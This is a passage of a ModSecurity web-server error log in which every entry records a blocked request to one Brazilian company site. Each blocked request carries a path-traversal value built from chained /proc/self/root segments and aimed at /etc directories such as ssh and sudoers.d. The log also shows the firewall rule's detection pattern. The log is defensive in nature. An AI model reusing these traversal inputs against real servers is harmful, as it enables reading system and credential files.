"OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf00wlT9VtDQc7bgUyWEAAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:17:39.216091 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.243.203:42456] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf047ysWC90G-1nBrAwxQAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:17:42.640840 2026] [:error] [pid 10709:tid 140411582465792] [client 74.7.243.203:41150] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf05hXjF1vJNtV6CWrkQQAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:17:43.930965 2026] [:error] [pid 10709:tid 140411683178240] [client 74.7.243.203:41164] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf05xXjF1vJNtV6CWrkQgAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:17:45.291093 2026] [:error] [pid 21806:tid 140411674785536] [client 74.7.243.203:41172] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf06dSswJuvopo3lOhLdgAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:17:48.715335 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.243.203:41180] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf07AlT9VtDQc7bgUyWHAAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:17:50.013181 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.243.203:41192] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf07rABkC4fWIHEf8HWAwAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:17:51.440793 2026] [:error] [pid 21946:tid 140411658000128] [client 74.7.243.203:56696] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf073bQATo66fKoS7w3egAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:17:52.791037 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.243.203:56706] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf08P9ocpUE4ed4uDzYHAAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:17:54.131040 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.243.203:56714] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf08rysWC90G-1nBrAwyAAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:17:57.590543 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.243.203:56718] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf09f9ocpUE4ed4uDzYIQAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:17:58.906236 2026] [:error] [pid 10831:tid 140411590858496] [client 74.7.243.203:56726] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf09o6lpbStxTqkSktaEQAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:18:08.740667 2026] [:error] [pid 10709:tid 140411540502272] [client 74.7.243.203:60304] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1ABXjF1vJNtV6CWrkUwAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:18:12.139722 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.243.203:60318] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1BLABkC4fWIHEf8HWDAAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:18:13.429423 2026] [:error] [pid 10709:tid 140411574073088] [client 74.7.243.203:40700] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1BRXjF1vJNtV6CWrkVQAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:18:15.607526 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.243.203:40712] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1B_9ocpUE4ed4uDzYJgAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:18:16.886770 2026] [:error] [pid 10831:tid 140411599251200] [client 74.7.243.203:40722] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1CI6lpbStxTqkSktaGAAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:18:18.675515 2026] [:error] [pid 11972:tid 140411607643904] [client 74.7.241.46:45034] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1Cpqj1wV0Si-OkefUUAAAABA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:18:20.278010 2026] [:error] [pid 21533:tid 140411699963648] [client 74.7.243.203:40738] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1DHjZBu2q05ozVU9BIgAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:18:22.063412 2026] [:error] [pid 10709:tid 140411590858496] [client 74.7.241.46:60312] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1DhXjF1vJNtV6CWrkWwAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:18:29.367261 2026] [:error] [pid 21946:tid 140411658000128] [client 74.7.241.46:60324] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1FXbQATo66fKoS7w3hwAAAMo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 09:18:35.214881 2026] [:error] [pid 21946:tid 140411607643904] [client 74.7.241.46:60324] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1G3bQATo66fKoS7w3jQAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
